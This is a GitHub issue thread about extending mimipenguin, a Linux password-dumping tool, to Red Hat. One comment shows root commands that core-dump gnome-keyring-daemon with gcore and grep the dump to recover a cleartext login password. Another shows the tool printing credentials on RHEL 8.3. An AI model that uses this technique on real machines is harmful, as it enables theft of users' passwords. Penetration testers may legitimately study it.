Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RedHat Support #8

Open
magnanimosity opened this issue Apr 3, 2017 · 8 comments
Open

RedHat Support #8

magnanimosity opened this issue Apr 3, 2017 · 8 comments

Comments

@magnanimosity
Copy link

Great work on this! Any chance of working in a RedHat component?

@dmalowiecki2
Copy link

+1 for this proposition

@1sn0m4d
Copy link

1sn0m4d commented Apr 5, 2017

+1 .. RedHat Support it`s good support

@espandy
Copy link

espandy commented Apr 6, 2017

image

Red Hat Enterprise Linux Server release 6.4 (Santiago) !!nonsupport!!;

@huntergregal
Copy link
Owner

@espandy that memory print issue has been fixed.

As for redhat support I will need to look at it some more. The new python port should be supported on redhat as well. But finding passwords depends on - a login using the Gnome GUI login screen or an active ssh session that has elevated at some point using sudo and a password prompt, or active vsftpd sessions.

I'm still planning to expand support or research other common services - just finishing up my senior project at school right now so im a bit busy. I'm keeping this open until i can come back and look at it some more

@heywji
Copy link

heywji commented Aug 15, 2017

Same Too...I'm RedHat7.1

@bcoles
Copy link
Contributor

bcoles commented Jul 7, 2018

mimipenguin.py requires Python 3.x, and default Python version on RedHat 7.0 is 2.7.5; so it's doomed to failure.

Confirmed, mimipenguin.sh returns no results on RedHat 7.0.

[user@localhost Desktop]$ gnome-keyring version
gnome-keyring: 3.8.2

libgthread-2.0.so.0 is a possible needle.

[root@localhost Desktop]# ps aux | grep gnome-keyring
user      9241  0.0  0.5 400160  5860 ?        Sl   04:14   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
root      9981  0.0  0.0 112640   984 pts/0    R+   04:15   0:00 grep --color=auto gnome-keyring
[root@localhost Desktop]# gcore -o dump 9241
[New LWP 9573]
[New LWP 9442]
[New LWP 9440]
[New LWP 9439]
[New LWP 9242]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
0x00007ff8b18c8e0d in poll () from /lib64/libc.so.6
warning: target file /proc/9241/cmdline contained unexpected null characters
Saved corefile dump.9241
[root@localhost Desktop]# strings dump.9241 | grep libgthread-2.0.so.0 -B 5 -A 5
/usr/lib64/libgck-1.so.0.0.0
/usr/lib64/libgcr-base-3.so.1.0.0
/usr/lib64/libgcr-base-3.so.1.0.0
/usr/lib64/libgcr-base-3.so.1.0.0
/usr/lib64/libgcr-base-3.so.1.0.0
/usr/lib64/libgthread-2.0.so.0.3600.3
/usr/lib64/libgthread-2.0.so.0.3600.3
/usr/lib64/libgthread-2.0.so.0.3600.3
/usr/lib64/libgthread-2.0.so.0.3600.3
/usr/lib64/ld-2.17.so
/usr/share/glib-2.0/schemas/gschemas.compiled
/etc/dconf/db/distro
/etc/dconf/db/site
/etc/dconf/db/local
--
libpthread.so.0
libc.so.6
_edata
__bss_start
_end
libgthread-2.0.so.0
GLIBC_2.2.5
=z	 
=J	 
fffff.
fffff.
--
a(ss)input-sources/
xkb-options
aslegacy/
asdfasdf           # <-- password
asdfasdf           # <-- password
/lib64/libgthread-2.0.so.0
libgthread-2.0.so.0
/lib64
libgthread-2.0.so.0
/lib64/libgcr-base-3.so.1
libgcr-base-3.so.1
/lib64
libgcr-base-3.so.1
;*3$"
[root@localhost Desktop]# 

@bcoles
Copy link
Contributor

bcoles commented Nov 8, 2021

Red Hat 8.3

C and Python version work on Red Hat 8.3.

[root@localhost mimipenguin-master]# uname -a
Linux localhost.localdomain 4.18.0-240.el8.x86_64 #1 SMP Wed Sep 23 05:13:10 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost mimipenguin-master]# cat /etc/redhat-release 
Red Hat Enterprise Linux release 8.3 (Ootpa)
[root@localhost mimipenguin-master]# ./mimipenguin
[+] Searching: [SYSTEM - GNOME] (gdm-password)
[+] Searching: [SYSTEM - GNOME] (gnome-keyring-daemon)
  [-] user:password
[root@localhost mimipenguin-master]# ./mimipenguin.sh 
MimiPenguin Results:
[root@localhost mimipenguin-master]# ./mimipenguin.py 
[SYSTEM - GNOME]	user:password
[SYSTEM - GNOME]	user:password

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

8 participants
@bcoles @espandy @huntergregal @dmalowiecki2 @heywji @1sn0m4d @magnanimosity and others